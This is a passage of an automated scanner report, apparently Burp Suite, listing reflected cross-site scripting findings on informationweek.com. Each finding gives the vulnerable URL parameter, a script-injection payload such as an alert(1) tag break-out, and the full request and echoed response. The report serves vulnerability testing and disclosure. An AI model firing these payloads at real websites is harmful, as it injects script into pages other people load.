HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=UNV33D2SOQRMRQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32757
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=/news/internet/policyaa3f5"><a b=c>a23bc44272e/showArticle;kvarticleid=;kvauthor=;loc=300;grp=944805944" target="_blank"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b921"><script>alert(1)</script>0efdcc57e3e was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/policy/showArticle.jhtml?articleID=2159008027b921"><script>alert(1)</script>0efdcc57e3e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:43 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:43 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=V5Q21WN3IHVJ1QE1GHRSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 34033
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/internet/policy/showArticle.jhtml?articleID=2159008027b921"><script>alert(1)</script>0efdcc57e3e"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f5d1'%3balert(1)//14c6e9df0d9 was submitted in the articleID parameter. This input was echoed as 8f5d1';alert(1)//14c6e9df0d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/policy/showArticle.jhtml?articleID=2159008028f5d1'%3balert(1)//14c6e9df0d9 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=YX5YPHO4TKQC5QE1GHPCKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33620
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Policy_Welcome_Ad_1x1;key=2159008028f5d1';alert(1)//14c6e9df0d9+/news/internet/policy/showArticle/dhandler;kvarticleid=2159008028f5d1';alert(1)//14c6e9df0d9;kvauthor=;loc=100;target=_blank;grp=924067111;misc='+new Date().getTime()+'"> ...[SNIP]...
1.45. http://www.informationweek.com/news/internet/policy/showArticle.jhtml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/news/internet/policy/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5697d"><script>alert(1)</script>e49d0cc96c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/policy/showArticle.jhtml?articleID=215900802&5697d"><script>alert(1)</script>e49d0cc96c3=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=W3ICUW4BFHK5DQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 81967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/policy/showArticle.jhtml?articleID=215900802&5697d"><script>alert(1)</script>e49d0cc96c3=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e35a"><script>alert(1)</script>cdc66f6af3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news4e35a"><script>alert(1)</script>cdc66f6af3c/internet/security/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=XFBFROKJFGZPJQE1GHRSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32857
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news4e35a"><script>alert(1)</script>cdc66f6af3c/internet/s;kvarticleid=;kvauthor=;loc=300;grp=147213812" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1fdce'-alert(1)-'02711aaebeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news1fdce'-alert(1)-'02711aaebeb/internet/security/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=U2TLDNWT3TPF3QE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32807
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news1fdce'-alert(1)-'02711aaebeb/internet/security/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=599486144;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebaf4'-alert(1)-'f4f3b6f3e1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internetebaf4'-alert(1)-'f4f3b6f3e1d/security/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=4XK0R0JDGOMXVQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32631
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/internetebaf4'-alert(1)-'f4f3b6f3e1d/security/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=897474167;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19f0b"><script>alert(1)</script>7d67752ca8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet19f0b"><script>alert(1)</script>7d67752ca8/security/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=F0QULAYVNFOSVQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32667
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Security_HP_Welcome_Ad_1x1;key=/news/internet19f0b"><script>alert(1)</script>7d67752ca8/se;kvarticleid=;kvauthor=;loc=300;grp=91262792" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1330"><a%20b%3dc>d382df97e96 was submitted in the REST URL parameter 3. This input was echoed as f1330"><a b=c>d382df97e96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/internet/securityf1330"><a%20b%3dc>d382df97e96/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=BPI4ITHG2UAOZQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32809
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news/internet/securityf1330"><a b=c>d382df97e96/showArticle;kvarticleid=;kvauthor=;loc=300;grp=928838864" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d089b'-alert(1)-'300de3d8ef4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/securityd089b'-alert(1)-'300de3d8ef4/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:36 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:36 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=YMOEN2YS4YZKPQE1GHRSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32771
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... nguage="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=/news/internet/securityd089b'-alert(1)-'300de3d8ef4/showArt;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=51648980;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febdf"><script>alert(1)</script>1494b2e1781 was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/security/showArticle.jhtml?articleID=210200864febdf"><script>alert(1)</script>1494b2e1781 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=LDPQ53XSQUTNXQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 34101
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=210200864febdf"><script>alert(1)</script>1494b2e1781"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6238c'%3balert(1)//7de85999a0 was submitted in the articleID parameter. This input was echoed as 6238c';alert(1)//7de85999a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet/security/showArticle.jhtml?articleID=2102008646238c'%3balert(1)//7de85999a0 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:45 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:45 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=NALYQ3FZOGA3JQE1GHPCKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 33649
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_Internet_Security_Welcome_Ad_1x1;key=2102008646238c';alert(1)//7de85999a0+/news/internet/security/showArticle/dhandler;kvarticleid=2102008646238c';alert(1)//7de85999a0;kvauthor=;loc=100;target=_blank;grp=385233938;misc='+new Date().getTime()+'"> ...[SNIP]...
1.54. http://www.informationweek.com/news/internet/security/showArticle.jhtml [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/news/internet/security/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b45d3"><script>alert(1)</script>d121f2badb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet/security/showArticle.jhtml?articleID=210200864&b45d3"><script>alert(1)</script>d121f2badb5=1 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 02:15:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=E1JLJYKE0BVVLQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 81943
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/internet/security/showArticle.jhtml?articleID=210200864&b45d3"><script>alert(1)</script>d121f2badb5=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fadc"><script>alert(1)</script>e5b3b34a7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news1fadc"><script>alert(1)</script>e5b3b34a7c/internet/social_network/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=REZD3IBKYH1F1QE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32687
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news1fadc"><script>alert(1)</script>e5b3b34a7c/internet/so;kvarticleid=;kvauthor=;loc=300;grp=110855041" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fc45'-alert(1)-'3a198292b56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news2fc45'-alert(1)-'3a198292b56/internet/social_network/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:25 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:25 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=02ILPTLOVT5TBQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32639
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Internet_HP_Welcome_Ad_1x1;key=/news2fc45'-alert(1)-'3a198292b56/internet/social_network/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=622571078;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97dda'-alert(1)-'f5d49875dd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/internet97dda'-alert(1)-'f5d49875dd7/social_network/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:27 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:27 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=O5FAGBDRACS1VQE1GHPSKH4ATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32160
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet97dda'-alert(1)-'f5d49875dd7/social_network/s;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=910170881;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949fb"><script>alert(1)</script>ca1d846fb33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/internet949fb"><script>alert(1)</script>ca1d846fb33/social_network/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 11 Dec 2010 02:15:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 11 Dec 2010 02:15:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=JMMYYDFYBD4EDQE1GHPSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32198
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/internet949fb"><script>alert(1)</script>ca1d846fb33/s;kvarticleid=;kvauthor=;loc=300;grp=57020140" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63df4"><a%20b%3dc>77a552403ed was submitted in the REST URL parameter 3. This input was echoed as 63df4"><a b=c>77a552403ed in the application's response.
